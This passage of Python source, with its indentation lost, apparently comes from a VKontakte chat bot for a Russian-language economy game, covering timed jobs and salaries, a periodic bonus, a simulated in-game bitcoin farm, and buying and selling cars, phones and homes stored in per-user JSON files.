"\n\n" \
"\nЧтобы устроиться на работу 'устроиться {номер}'"
return s
def work(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["wstatus"] == False:
if ff["work"] != "":
if ff["level"] >= 1:
if ff["work"] == "FakeTAXI":
work = 1
ff["wstatus"] = True
threading.Timer(20.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать в FakeTAXI! \nЗакончите через 20 секунд"
if ff["work"] == "Ферма":
ff["wstatus"] = True
work = 2
threading.Timer(40.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать на Ферме! \nЗакончите через 40 секунд"
if ff["level"] >= 2:
if ff["work"] == "Тестировщик игр":
ff["wstatus"] = True
work = 3
threading.Timer(60.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Тестировщиком игр! \nЗакончите через 1 минуту"
if ff["work"] == "Работник кофейни":
ff["wstatus"] = True
work = 4
threading.Timer(90.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать в кофейне! \nЗакончите через 1:30 минуты"
else:
return "У вас слишком маленький уровень! \nНеобходим: 2\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 3:
if ff["work"] == "Рабочий на заводе":
ff["wstatus"] = True
work = 5
threading.Timer(120.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать на Заводе! \nЗакончите через 2 минуты"
if ff["work"] == "Дегустатор вина":
ff["wstatus"] = True
work = 6
threading.Timer(180.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Дегустатором вина! \nЗакончите через 3 минуты"
else:
return "У вас слишком маленький уровень! \nНеобходим: 3\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 4:
if ff["work"] == "Продавец в Verdax":
ff["wstatus"] = True
work = 7
threading.Timer(300.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать продавцом в Verdax'e! \nЗакончите через 5 минут"
if ff["work"] == "Дизайнер":
ff["wstatus"] = True
work = 8
threading.Timer(600.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Дизайнером! \nЗакончите через 10 минут"
else:
return "У вас слишком маленький уровень! \nНеобходим: 4\nВаш уровень: " + str(ff["level"])
if ff["level"] >= 5:
if ff["work"] == "Режиссёр Аниме":
ff["wstatus"] = True
work = 9
threading.Timer(1200.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Режиссёром Аниме! \nЗакончите через 20 минут"
if ff["work"] == "Директор Natflex":
ff["wstatus"] = True
work = 10
threading.Timer(2400.0, workend, args=(id, work,)).start()
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "✅ Вы начали работать Директором Natflex'a! \nЗакончите через 40 минут"
else:
return "⚠ У вас слишком маленький уровень! \nНеобходим: 5\nВаш уровень: " + str(ff["level"])
else:
return "⚠ Вы не устроены на работу!\nСписок работ: 'работы'"
else:
return "⚠ Вы уже работаете!"
def workend(id,work):
work = str(work)
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if work == "1":
slr = 100
exp = 2
if work == "2":
slr = 180
exp = 4
if work == "3":
slr = 420
exp = 6
if work == "4":
slr = 600
exp = 9
if work == "5":
slr = 1080
exp = 12
if work == "6":
slr = 1600
exp = 18
if work == "7":
slr = 3600
exp = 30
if work == "8":
slr = 7000
exp = 60
if work == "9":
slr = 18000
exp = 0
if work == "10":
slr = 36000
exp = 0
ff["wstatus"] = False
ff["balance"] += slr
if ff["level"] < 5:
ff["exp"] += exp
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
lvlcheck(id)
if work == "9" or work == "10":
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вы закончили работу!\nВам начислена зарплата в размере: \n" + str(
slr) + "$",
"keyboard": rework().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вы закончили работу!\nВам начислена зарплата в размере: \n" + str(slr) + "$" + " и " + str(exp) + " опыта",
"keyboard": rework().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
def report(id, msg):
if len(msg) <= 100:
for i in admins:
vk.method("messages.send", {"peer_id": i,
"message": "⚠ Репорт | vk.com/gim196468884?sel=" + id + " | " + msg,
"random_id": random.randint(1, 2147483647)})
return "✅ Репорт отправлен!"
else:
return "⚠ Ваш репорт превышает 100 символов"
def cgbonus(id):
vk.method("messages.send", {"peer_id": id,
"message": "💎 Вам снова доступен бонус!\nИспользуйте 'бонус', чтобы получить его",
"keyboard": bonusmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
def gbonus(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
o = (int(time.time()) - (ff["lbonus"] + 300)) * -1
if (int(time.time())) - ff["lbonus"] >= 300:
ff["balance"] += 300
ff["lbonus"] = int(time.time())
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Timer(300.0, cgbonus, args=(id,)).start()
vk.method("messages.send", {"peer_id": id,
"sticker_id": 8484,
"random_id": random.randint(1, 2147483647)})
return "💎 Вы получили бонус в размере 300$!\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Бонус можно получать раз в 5 минут!\nВозвращайтесь через " + str(o) + " секунд"
def idsearch(id):
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
id_ = id.split('/')[-1]
try:
id = str(vk.method('users.get', {'user_ids': id_})[0]['id'])
except:
return "Пример использования:\nид vk.com/gamtz"
if id in f:
try:
return "👤 ID пользователя: " + id + "\n👔 Персонал: " + ifstaff(int(id))
except:
return "Пример использования:\nид vk.com/gamtz"
else:
return "Такого пользователя не существует!"
def ids(id):
path = "json/"
f = os.listdir(path)
for i in range(len(f)):
f[i] = str(f[i][:-5])
if "@" in id:
id_ = id.split('@')[-1][:-1]
else:
id_ = id.split('/')[-1]
try:
id = str(vk.method('users.get', {'user_ids': id_})[0]['id'])
except:
return "USER GET ERROR"
if id in f:
try:
return id
except:
return "USER NOT EXIST"
def congrts(id):
vk.method("messages.send", {"peer_id": id,
"sticker_id": 11788,
"random_id": random.randint(1, 2147483647)})
# Bytecoin
# shop
def farmstatus(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return "Состояние вашей фермы:" \
"\n" \
"\n 📄 Видеокарты: " + farmcheck(id) + \
"\n 🔋 Добыча: " + str(ff["farm"] * ff["gpu_amount"]) + " ₿ / 5 мин" + \
"\n 💴 Добыто в биткоинах: " + str(round(ff["farmed"] * ff["gpu_amount"],5)) + " ₿" + \
"\n 💵 Добыто в долларах: " + str(int(ff["farmed"] * 10000 * ff["gpu_amount"])) + " $" + \
"\n" \
"\n📌 Для снятия используйте 'сбитки'" \
#магазин
def sellbtc(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["farmed"] != 0.0:
temp = str(round(ff["farmed"],5))
ff["farmed"] = 0.0
ff["btc"] += float(temp)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "💱 Вы успешно перевели " + temp + " на основной счет"\
"\n💴 Ваш баланс: " + str(ff["btc"]) + " ₿"
else:
return "У вас нет накопившихся ₿"
def btcfarm(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["farmed"] += ff["farm"] * ff["gpu_amount"]
ff["farm"] = round(ff["farm"] * ff["gpu_amount"],5)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Thread(target=btcfarmstart, args=(id,)).start()
return 0
def btcfarmstart(id):
threading.Timer(300.0, btcfarm, args=(id,)).start()
return 0
def btcfarmreload():
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][:-5])
for i in range (len(f)):
id = f[i]
btcfarmstart(id)
return 0
# Bytecoin
def bfarm(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["gpu_amount"] < 5:
if n == "1" or n == "7": p = 10000
elif n == "2" or n == "8": p = 50000
elif n == "3" or n == "9": p = 100000
elif n == "4" or n == "10": p = 300000
elif n == "5" or n == "11": p = 500000
elif n == "6" or n == "12": p = 1500000
if n == '1' and ff["balance"] >= p:
if ff["gpu"] == "GF 210" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF 210"
ff["gpu_amount"] += 1
ff["farm"] = 0.00025
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '2' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 750 Ti" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 750 Ti"
ff["gpu_amount"] += 1
ff["farm"] = 0.0005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '3' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 1050 Ti" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 1050 Ti"
ff["gpu_amount"] += 1
ff["farm"] = 0.001
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '4' and ff["balance"] >= p:
if ff["gpu"] == "GF GTX 1660S" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF GTX 1660S"
ff["gpu_amount"] += 1
ff["farm"] = 0.005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '5' and ff["balance"] >= p:
if ff["gpu"] == "GF RTX 2080S" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF RTX 2080S"
ff["gpu_amount"] += 1
ff["farm"] = 0.01
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '6' and ff["balance"] >= p:
if ff["gpu"] == "GF RTX 3090 Mining ver" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "GF RTX 3090 Mining ver"
ff["gpu_amount"] += 1
ff["farm"] = 0.05
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '7' and ff["balance"] >= p:
if ff["gpu"] == "R5 220" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R5 220"
ff["gpu_amount"] += 1
ff["farm"] = 0.00025
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '8' and ff["balance"] >= p:
if ff["gpu"] == "R7 360" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R7 360"
ff["gpu_amount"] += 1
ff["farm"] = 0.0005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '9' and ff["balance"] >= p:
if ff["gpu"] == "R9 380" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "R9 380"
ff["gpu_amount"] += 1
ff["farm"] = 0.001
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '10' and ff["balance"] >= p:
if ff["gpu"] == "RX 580" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX 580"
ff["gpu_amount"] += 1
ff["farm"] = 0.005
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '11' and ff["balance"] >= p:
if ff["gpu"] == "RX5700" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX5700"
ff["gpu_amount"] += 1
ff["farm"] = 0.01
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
elif n == '12' and ff["balance"] >= p:
if ff["gpu"] == "RX6900XT" or ff["gpu"] == "":
ff["balance"] -= p
ff["gpu"] = "RX6900XT"
ff["gpu_amount"] += 1
ff["farm"] = 0.05
ff["farming"] = True
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["gpu"]) + " за " + str(p) + "$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "Вы можете купить только несколько одинаковых видеокарт"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: ккарту 1"
else:
return "У вас максимальное кол-во видеокарт - 5"
def sfarm(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["gpu"] != "":
if ff["gpu"] == "GF 210":
ff["balance"] += 10000
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 750 Ti":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 50000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 1050 Ti":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 100000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 100.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF GTX 1660S":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 300000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF RTX 2080S":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "GF RTX 3090 Mining ver":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 1500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1.500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R5 220":
ff["balance"] += 10000
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R7 360":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 50000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "R9 380":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 100000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 100.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX 580":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 300000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX5700":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX6900XT":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 1500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1.500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "nVidia Tesla A100":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 5000000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 5.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет видеокарты!'
def bcar(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["car"] == "":
if n == '1' and ff["balance"] >= 2000:
ff["balance"] -= 2000
ff["car"] = "ВАЗ 2115"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 4000:
ff["balance"] -= 4000
ff["car"] = "LADA Vesta"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 4.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 8000:
ff["balance"] -= 8000
ff["car"] = "Audi Q7"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 8.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 15000:
ff["balance"] -= 15000
ff["car"] = "BMW M8"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 15.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["car"] = "Range Rover"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '6' and ff["balance"] >= 150000:
ff["balance"] -= 150000
ff["car"] = "Rolls-Royce"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: кмашину 1"
else:
return "У вас уже есть машина или вы неправильно используете команду!\nПример: кмашину 1\nЧтобы продать её, используйте 'пмашину'"
def sellcar(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["car"] != "":
if ff["car"] == "ВАЗ 2115":
ff["car"] = ""
ff["balance"] += 2000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "LADA Vesta":
ff["car"] = ""
ff["balance"] += 4000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 4.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Audi Q7":
ff["car"] = ""
ff["balance"] += 8000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 8.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "BMW M8":
ff["car"] = ""
ff["balance"] += 15000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 15.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Range Rover":
ff["car"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Rolls-Royce":
ff["car"] = ""
ff["balance"] += 150000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет машины!'
# cars
# phones
def bphone(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["phone"] == "":
if n == '1' and ff["balance"] >= 200:
ff["balance"] -= 200
ff["phone"] = "Fly Ezzy Flip"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 200$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 1000:
ff["balance"] -= 1000
ff["phone"] = "Sony Xperia XA1"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 1.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 10000:
ff["balance"] -= 10000
ff["phone"] = "Xiaomi Mi 11"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["phone"] = "Samsung Galaxy S21"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 200000:
ff["balance"] -= 200000
ff["phone"] = "iPhone 12"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 200.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: ктел 1"
else:
return "У вас уже есть телефон или вы неправильно используете команду!\nПример: ктел 1\nЧтобы продать его, используйте 'птел'"
def sellphone(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["phone"] != "":
if ff["phone"] == "Fly Ezzy Flip":
ff["balance"] += 200
ff["phone"] = ""
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 200$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Sony Xperia XA1":
ff["phone"] = ""
ff["balance"] += 1000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 1.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Xiaomi Mi 11":
ff["phone"] = ""
ff["balance"] += 10000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Samsung Galaxy S21":
ff["phone"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "iPhone 12":
ff["phone"] = ""
ff["balance"] += 200000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 200.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "iPhone 12 Gold Edition":
ff["phone"] = ""
ff["balance"] += 1000000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет телефона!'
# phones
# homes
def bhome(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["home"] == "":
if n == '1' and ff["balance"] >= 100:
ff["balance"] -= 100
ff["home"] = "Картонная коробка"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 100$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 2000:
ff["balance"] -= 2000
ff["home"] = "Дом на дереве"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 10000:
ff["balance"] -= 10000
ff["home"] = "Деревянный дом"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["home"] = "Квартира в новостройке"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 150000:
ff["balance"] -= 150000
ff["home"] = "Особняк"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '6' and ff["balance"] >= 300000:
ff["balance"] -= 300000
ff["home"] = "Дом на Рублёвке"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '7' and ff["balance"] >= 500000:
ff["balance"] -= 500000
ff["home"] = "Личный остров"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
